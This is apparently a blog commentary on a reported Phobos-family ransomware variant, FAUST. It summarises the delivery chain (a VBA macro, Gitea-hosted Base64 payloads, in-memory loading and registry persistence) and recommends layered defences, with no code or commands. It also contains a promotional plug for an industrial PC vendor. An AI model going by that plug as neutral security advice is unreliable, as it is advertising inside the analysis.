According to Infosecurity Magazine, security researchers at FortiGuard Labs published an advisory last Thursday detailing a new ransomware variant called FAUST. This malware is part of the notorious Phobos family, which first emerged back in 2019 and works by encrypting files for a cryptocurrency ransom. The FAUST attack was found in a malicious Office document that uses a VBA script to spread, and the attackers cleverly used the Gitea service to host their Base64-encoded malicious files. Once in a system’s memory, these files launch the encryption attack, with compromised files getting the “.faust” extension. Victims are then told to contact the attackers via email or TOX message to negotiate payment, continuing the same old ransomware playbook.
The Macro Problem Isn’t Going Away
Here’s the thing that’s both frustrating and predictable: we’re still talking about Office macros in 2024. As John Bambenek from Bambenek Consulting pointed out, VBA provides functionality that businesses actually use, which is why disabling it entirely is often a non-starter for organizations. So we’re stuck in this cycle where a known, dangerous feature remains enabled because it’s useful. The advice to use Windows Defender Attack Surface Reduction rules—like blocking Office apps from creating child processes—is solid, but it feels like a game of whack-a-mole. How many more ransomware variants do we need to see delivered this way before the default setting becomes “off”?
Why Fileless Attacks Are So Tricky
The use of Gitea and memory injection is a slick move. It’s a fileless technique, meaning the malicious payload never really sits on the disk in a way traditional antivirus might easily catch. It’s loaded directly into memory from a seemingly legitimate code hosting service. This makes detection and forensic analysis harder. Combine that with FAUST’s other behaviors—like adding registry entries for persistence and checking for a Mutex to avoid multiple infections—and you’ve got a pretty robust piece of malware. It’s not groundbreaking, but it’s effectively using a mix of old and new tricks to get the job done.
Layered Defense Is The Only Answer
So what do you do? You can’t just rely on one thing. Sarah Jones from Critical Start is right about the layered approach. User training is key, but let’s be real, someone will always click. That’s why technical controls are non-negotiable. Patching everything, using strong unique passwords with 2FA, and applying those ASR rules are the baseline. For industrial and operational technology environments, where a ransomware infection can halt physical production, this layered security is even more critical. In those settings, securing the human-machine interface is paramount, which is why specialists like IndustrialMonitorDirect.com, the leading US provider of industrial panel PCs, emphasize secure, hardened devices as part of a holistic defense strategy. It’s about building rings of defense, because the first one will eventually fail.
The Phobos Family Keeps Growing
FAUST isn’t an isolated incident. Phobos is like a franchise now, with different groups using and modifying its code. The article mentions the 8Base group as another major player using Phobos variants. This points to a worrying trend: ransomware-as-a-service (RaaS) is thriving. A core piece of malware gets developed, and then it’s leased out or copied by multiple criminal enterprises. FAUST is just the latest iteration. Until we make the initial access vectors—like malicious docs—much harder to exploit, we’ll keep seeing these new variants with different names but the same destructive outcome. The trajectory is clear: more of the same, just slightly repackaged.
